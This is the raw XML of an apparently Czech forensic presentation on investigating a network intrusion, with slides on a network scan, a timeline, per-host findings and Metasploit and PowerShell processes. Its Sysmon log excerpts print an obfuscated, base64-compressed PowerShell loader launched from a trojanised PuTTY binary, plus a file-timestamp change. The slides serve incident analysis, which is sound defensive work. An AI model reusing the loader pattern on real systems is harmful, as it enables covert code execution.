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rek" initials="MJ" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="a866d2a68a1f8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207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1873" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="105" d="100"/>
          <a:sy n="10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4D6EE6-0174-4142-9BD6-390B0B7F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MINUTE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6539AA-8BBF-4BF5-A015-6DD11ED90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Michael Jurek, Mikuláš </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Bankovič</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, Vojtěch Janků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80769" y="982176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"Process Create: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RuleName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UtcTime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2019-03-26 21:14:44.276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C:\Windows\System32\conhost.exe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FileVersion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10.0.17134.1 (WinBuild.160101.0800)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Console Window Host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Product: Microsoft? Windows? Operating System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Microsoft Corporation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\??\C:\WINDOWS\system32\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conhost.exe 0xffffffff -ForceV1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CurrentDirectory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PC2\user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IntegrityLevel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Hashes: SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED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ParentImage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C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe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""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powershell.exe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 -noni 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-w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&amp;([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]::create((New-Object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IO.StreamReader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IO.Compression.GzipStream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IO.MemoryStream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,[Convert]::FromBase64String('H4sIAFuWmlwCA7VW/W+iSBj+uU36P5CNiZBaRWu7vSabHCAornRlUbR65kJhhFkHcGGo4t7+7/eOQLebbe92LzlCwny8n8/7zLyss8ilOI44/5r7cnZ6MnYSJ+T42mZ+3eBqIRZOTmC1Fut2yr3j+KW03fbi0MHR6vZWyZIERbSYN/uISmmKwgeCUcoL3F/cLEAJuvjw8Am5lPvC1f5s9kn84JBSLFccN0DchRR5bG8Uuw6LpGltCaZ8/+VTc79RPrZ2Kh7tN+/aUbV0e7uAIOHA7m6aIxT5NGiI+0tRhN4i7rsi5PjzaSnxNufBUIN1pgKWwjA5GhbY+a2lgTf/P8Eq74wAPt6/gvVt7R92fwpAsVEm/MP69wu/BOgvpj5zMAU5C649gorW+woCJTOe/Z2wskDl1+XDfi8/ZPTiDn5azk7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BrreYUTFCgAA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'))),[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IO.Compression.CompressionMode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]::Decompress))).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ReadToEnd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()))";"1";"5";;"4";"1";"0";"-9223372036854775808";"589779";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:44";;;"Microsoft-Windows-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Sysmon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/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"Process Create (rule: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ProcessCreate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)";"System.Collections.ObjectModel.ReadOnlyCollection`1[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System.String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]";"System.Collections.Generic.List`1[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System.Diagnostics.Eventing.Reader.EventProperty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301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POWERSHELL PROCESS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70452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498473" y="1736229"/>
            <a:ext cx="1051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"File creation time changed:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>RuleName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>UtcTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: 2019-03-26 21:14:43.489</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ProcessGuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: {9CA6D9DA-9643-5C9A-0000-001029551801}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ProcessId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: 5620</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>powershell.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>TargetFilename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>GPTP47LXLWQ9XHJFBNUM.temp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>CreationUtcTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: 2019-02-18 07:25:45.895</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>PreviousCreationUtcTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: 2019-03-26 21:14:43.489";"2";"4";;"4";"2";"0";"-9223372036854775808";"589777";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:43";;;"Microsoft-Windows-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/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"File creation time changed (rule: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>FileCreateTime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01169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341915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16761" y="1834651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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>CurrentDirectory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: C:\WINDOWS\system32\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>User: PC2\user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>LogonGuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: {9CA6D9DA-818F-5C9A-0000-002032380300}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>LogonId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: 0x33832</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>TerminalSessionId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>IntegrityLevel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: High</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Hashes: SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ParentProcessGuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: {9CA6D9DA-9495-5C9A-0000-00108C710901}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ParentProcessId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: 7660</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ParentImage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: C:\Users\user\Desktop\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>putty_x64.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ParentCommandLine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: ""C:\Users\user\Desktop\putty_x64.exe"" ";"1";"5";;"4";"1";"0";"-9223372036854775808";"589771";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:42";;;"Microsoft-Windows-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/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"Process Create (rule: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ProcessCreate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13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274148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70F9D99-4B42-41B6-AC0E-3C7DE369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32" y="0"/>
            <a:ext cx="68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yoe0lGHrHLk/Wc1Jx2Q6ooI/AAAAAAAABA8/-e75oChj3zYPj9v_hf_Gaa0j5lM1XoBkwCLcBGAs/s1600/Win%2B10%2Bfixed.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6059BDFC-DCC0-4C24-AB1C-F0626C63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969408"/>
            <a:ext cx="8374380" cy="4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SCHÉMA SÍTĚ</a:t>
            </a:r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0540EF43-25E6-4FF5-AAD1-8E6F08B5F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8" y="1011765"/>
            <a:ext cx="524116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32" y="648931"/>
            <a:ext cx="6390723" cy="871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dirty="0"/>
              <a:t>SCAN SÍTĚ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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DF40FA8-7A38-40A5-8C46-9D6194C9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1" y="1876995"/>
            <a:ext cx="3341190" cy="2816247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Obdélník 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAA2DE75-D9B1-4CC6-9A31-810E2BD865D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4993980" y="1870184"/>
            <a:ext cx="57479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Ipconfig /all on WIN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–script vuln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07"/>
            <a:ext cx="12192000" cy="585926"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="5400" dirty="0"/>
              <a:t>ČASOVÁ OSA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Šipka: pětiúhelník 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{717747CE-B663-444C-BFB3-5494E74640E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="1280160"/>
            <a:ext cx="10433304" cy="54864"/>
          </a:xfrm>
          <a:prstGeom prst="homePlate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Šipka: pětiúhelník 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{693970EB-BAA3-44FF-98E3-CA609769E1C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="2246376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pětiúhelník 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9DD2F10-0561-4872-A497-2DBEF83AF8CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="335579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pětiúhelník 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A33793C-F4CD-4417-9A4C-EB2331C0D8F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="44377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Šipka: pětiúhelník 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42054E7B-261B-4692-B6AE-8E95C17F84DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="54282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5280D-327E-444F-AAB0-62F3009C8F03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="490903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D0A1CF-0847-45AA-950B-0090AC604CAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="180746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8C0FF8A-3101-4843-95C8-5AE06B693F8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="295903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16F1324-C3FF-4816-BC44-49A33E831588}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="397339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AD40797-E8A0-45CA-99C6-D919A29679A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="910853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16" name="Řečová bublina: obdélníkový bublinový popisek 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E877136-BADF-4493-AB98-831F2E45B320}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3056001" y="4783205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319A71DB-E42A-4EF2-A07E-02B79869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" y="25628"/>
            <a:ext cx="2507173" cy="1200955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Řečová bublina: obdélníkový bublinový popisek 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E693B1CA-B095-4479-98C1-0F88A3E895B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2235708" y="648700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20:33</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Řečová bublina: obdélníkový bublinový popisek 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{668434A0-11C2-48E5-A53E-89AB6E25DD34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4254246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22:05</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Řečová bublina: obdélníkový bublinový popisek 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1632C10-F5AE-41A0-B849-68DF741C206C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8285988" y="645128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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Řečová bublina: obdélníkový bublinový popisek 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64A7B222-D562-4C84-9F3D-5BA9D597AC8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9189720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4" name="Řečová bublina: obdélníkový bublinový popisek 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20BF3145-5BC0-4F61-A416-0DB17DDF5373}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10232136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25" name="Řečová bublina: obdélníkový bublinový popisek 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{645B26E6-8026-4C95-A7AA-B316D991D92B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7982331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17:00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Řečová bublina: obdélníkový bublinový popisek 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{144A20DB-8A17-4BC8-AA49-A80880248017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9180576" y="1581738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7" name="Řečová bublina: obdélníkový bublinový popisek 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{458E0478-44C0-459E-B4E6-07BC498D045E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3056001" y="1589744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sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Řečová bublina: obdélníkový bublinový popisek 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BD3648A-4338-4D5B-943C-3F9E505568AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5223129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00:52</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Řečová bublina: obdélníkový bublinový popisek 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3470220-5AB9-4F7B-A62C-318D0C81DABA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6628257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12:41</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Řečová bublina: obdélníkový bublinový popisek 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E84E99F-7A58-46AD-860B-EB2D3CFBC53F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9180576" y="269688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31" name="Řečová bublina: obdélníkový bublinový popisek 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A13280FD-A63B-4981-9B99-0674B94D1436}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10232136" y="154531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2" name="Řečová bublina: obdélníkový bublinový popisek 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E32A4176-A206-4F36-B249-060F6DCFEF46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10202418" y="2688810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3" name="Řečová bublina: obdélníkový bublinový popisek 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99AB419D-26B2-4C24-AA70-04F0385CC27E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10202418" y="371124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4" name="Řečová bublina: obdélníkový bublinový popisek 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2BFC140-00CB-4ABC-AE3A-CCBBEFB8B2D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816983" y="375925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23:47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Řečová bublina: obdélníkový bublinový popisek 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98420A95-6DF5-4347-90DE-DFEDD1B77741}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000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08:15</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Řečová bublina: obdélníkový bublinový popisek 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60E2BCF6-CCC7-4766-B6F3-9DAB9079D22B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7530084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14:03</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Obrázek 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5423985B-0E00-4E2B-9BD4-F05F0DA3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" y="6073487"/>
            <a:ext cx="4629796" cy="581106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2251208B-707C-41AE-96CA-61A3FFCB6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3" y="4664927"/>
            <a:ext cx="5617589" cy="19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PC1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87AAFEF-7B3C-45BE-9C82-638E02B6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87" y="541247"/>
            <a:ext cx="10143413" cy="57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PC2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FCA5EF8-398D-4FB6-B789-E618A500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74" y="502921"/>
            <a:ext cx="10095026" cy="5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PC5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BAF8352-E9C2-4701-8333-0BE4ABD5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54" y="630937"/>
            <a:ext cx="10122046" cy="58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PC6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06702DF-27C4-46F8-B823-614351CF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43" y="733537"/>
            <a:ext cx="9812974" cy="56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PC6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B5482FB-B45C-453A-84EA-5AB7BF57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5" y="1897247"/>
            <a:ext cx="864945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686</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Širokoúhlá obrazovka</PresentationFormat>
  <Paragraphs>74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Paralaxa</vt:lpstr>
      <vt:lpstr>LAST MINUTE</vt:lpstr>
      <vt:lpstr>SCHÉMA SÍTĚ</vt:lpstr>
      <vt:lpstr>SCAN SÍTĚ</vt:lpstr>
      <vt:lpstr>ČASOVÁ OSA</vt:lpstr>
      <vt:lpstr>PC1</vt:lpstr>
      <vt:lpstr>PC2</vt:lpstr>
      <vt:lpstr>PC5</vt:lpstr>
      <vt:lpstr>PC6</vt:lpstr>
      <vt:lpstr>PC6</vt:lpstr>
      <vt:lpstr>POWERSHELL PROCESS</vt:lpstr>
      <vt:lpstr>METASPLOIT PROCESS</vt:lpstr>
      <vt:lpstr>METASPLOIT PROCESS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MINUTE</dc:title>
  <dc:creator>Michael Jurek</dc:creator>
  <cp:lastModifiedBy>Michael Jurek</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-13T06:17:26Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-13T07:10:40Z</dcterms:modified>
</cp:coreProperties>
</file>